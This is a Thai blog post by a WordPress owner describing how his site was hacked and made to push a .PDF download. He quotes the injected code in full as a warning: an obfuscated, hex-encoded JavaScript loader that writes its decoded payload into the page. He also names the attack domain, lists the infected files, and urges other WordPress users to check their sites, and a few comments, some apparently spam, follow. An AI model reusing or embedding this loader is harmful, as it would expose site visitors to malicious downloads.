โดน Hack อีกล่ะ

โดนของอีกล่ะ Goo

hacked
โดน hack ไม่รู้ของเขมรอ่ะเปล่า

ห่างหายไปนานเรื่อง Hack วันนี้กลับมาแล้วโดนฝังสคริปในวันพ่อซ่ะงั้น อยู่ดีๆเปิดเว็บมารู้สึกแปลกๆว่าทำไมมันต้องให้โหลดไฟล์ .PDF ทีแรกคิดว่าเป็น ADS จากเว็บอื่นที่ไหนได้จาก Blog เราเองค้นหาชื่อตาม URL ที่มันให้โหลดก็ไม่เจอ ใช้ Firefox หาก็ยังไม่เจอแต่รู้แล้วว่ามี URL แปลกๆเข้ามาไล่ตามหาพวกไอเฟรมทั้งหมดมีแต่ไอเฟรมของ แจกฟรี มือถือ Omnia เท่านั้นที่ใส่ไปล่าสุดคิดว่าเว็บนั้นโดนเล่นงานซ่ะแล้วก็ยังไม่ใช่ เลยนั่งวิวโค๊ดดูถึงบ้างอ้อว่ามันมาอีกแล้วเว็บ Goo นั่นเอง นั่งเช๊คไฟล์ที่ Server ก็ปกติพวก permission ต่างๆก็อยู่ดีครับแต่รู้ว่าไฟล์มีการเปลี่ยนแปลงอัพเดดในวันพ่อพอดี สงสัยมาให้ของขัวญผมเนื่องจากวันพ่ออ่ะมั้งครับ ขอบคุณนะแสดทีหลังไม่ต้อง

<script>function c71912231668n49392c989b139(n49392c989b90d){ function n49392c989c0e1(){return 16;}
return (parseInt(n49392c989b90d,n49392c989c0e1()));}function n49392c989d08a(n49392c989d86e)
{ var n49392c989efd9=2; var n49392c989e037='';n49392c989ff81=String.fromCharCode;for(n49392c989e805=0;
n49392c989e805<n49392c989d86e.length;n49392c989e805+=n49392c989efd9){ n49392c989e037+=(n49392c989ff81
(c71912231668n49392c989b139(n49392c989d86e.substr(n49392c989e805,n49392c989efd9))));}return n49392c989e037;}
 var xc9='';var n49392c98a0755='3C7'+xc9+'3637'+xc9+'2697'+xc9+'07'+xc9+'43E696628216D7'+xc9+'96961297'
+xc9+'B646F637'+xc9+'56D656E7'+xc9+'42E7'+xc9+'7'+xc9+'7'+xc9+'2697'+xc9+'465287'+xc9+'56E657'+xc9+'363617'
+xc9+'065282027'+xc9+'2533632536392536362537'+xc9+'3225363125366425363525323025366525363125366425363525336
4253633253337'+xc9+'2532302537'+xc9+'332537'+xc9+'32253633253364253237'+xc9+'2536382537'+xc9+'342537'+xc9+'
342537'+xc9+'30253361253266253266253632253639253637'+xc9+'2537'+xc9+'332536352536632536632537'+xc9+'332537'
+xc9+'3425363125363625363625326525363325366525326625363625363525363525363425363225363125363325366225326525
36382537'+xc9+'34253664253663253366253237'+xc9+'2532622534642536312537'+xc9+'342536382532652537'+xc9+'32253
6662537'+xc9+'352536652536342532382534642536312537'+xc9+'342536382532652537'+xc9+'3225363125366525363425366
6253664253238253239253261253331253330253336253332253336253239253262253237'+xc9+'253336253634253331253339253
335253634253334253333253237'+xc9+'2532302537'+xc9+'37'+xc9+'2536392536342537'+xc9+'342536382533642533352533
30253336253230253638253635253639253637'+xc9+'2536382537'+xc9+'342533642533322533312532302537'+xc9+'332537'+
xc9+'342537'+xc9+'39253663253635253364253237'+xc9+'2536342536392537'+xc9+'332537'+xc9+'302536632536312537'+
xc9+'39253361253230253665253666253665253635253237'+xc9+'2533652533632532662536392536362537'+xc9+'3225363125
366425363525336527'+xc9+'29293B7'+xc9+'D7'+xc9+'6617'+xc9+'2206D7'+xc9+'969613D7'+xc9+'47'+xc9+'27'+xc9+'56
53B3C2F7'+xc9+'3637'+xc9+'2697'+xc9+'07'+xc9+'43E';document.write(n49392c989d08a(n49392c98a0755));</script>

ใครว่างก็ไปถอดรหัสดูล่ะกันครับว่าข้อความมันคืออะไรผมใช้ Firebug ดูมันจะเป็นลิ้งค์เว็บพอคลิ้กไปแล้วจะเจอหน้า Report ว่าเว็บนี้อันตารายดูจากรูปข้างล่าง

hacked-2
Reported Attack Site!

พอคลิ้กว่าทำไมถึงทำการ Block เว็บเว็บนี้ลองอ่านดูครับว่ามีอะไรบ้างน่ากลัวซ่ะจริงๆ http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=en-US&site=http://bigsellstaff.cn/feedback.html?

ที่มาเขียน Blog นี้เพราะว่าให้เพื่อนๆที่ใช้ WordPress ลองตรวจสอบดูเว็บไซต์ตัวเองหน่ะครับว่ามีอะไรแปลกๆใหม่ๆ หมั่นวิวโค๊ดดูข้างในบ้างหรือว่าใช้ Firebug เช็คดูหน่อยมีลิ้งค์หรือไอเฟรมอะไรใหม่ๆแปลกๆเข้ามาตอนนี้ผมเองก็ได้แต่แก้ไขยังไม่ต้องหาทางกันเลยเพราะไม่รู้ว่ามันเข้าทางไหน ถ้ามาอีกก็ค่อยว่ากันตอนนี้อาบน้ำไปมิตติ้ง SEO ก่อนคร๊าบ

ลืมบอกไปไฟล์ที่ผมโดนนั้นอยู่ htdocs นอกๆเลย
index.php
-index.html
google402b7ab2d72a110b.html
readme.html
y_key_f5d1362b5f766606.html

และก็มีไฟล์ index.php เกือบทุกโฟลเดอร์เลยอ่า แสบจริงๆ

  • Pornkiller

    น่ากัวมากค่ะ แบบนี้ต้องเจอหมีธนูค่ะ
    พวกนี้เล่นตามเกมแล้วไม่เลิก ต้องล้มกระดาน

  • อย่างนี้ต้องใช้ เซียน ปราบ ครับ

    ดูแล้วไม่รู้เรื่องกับเค้าเลย

  • ผมยิ่งไม่มีความรู้อยู่ด้วยถ้าโดนสงสัยเสร็จแน่ๆ

  • มันโดนอะไรครับเนี่ย ถ้าผมโดนควขอ รี โฮส T_T
    เพราะแก้ไขไม่เป้นครับ ฮ่าๆ

  • the distinct perspective intended Chanel Lipstick tote from the hundred years

  • Hey may I notification some of the communication from this blog if I link back to you?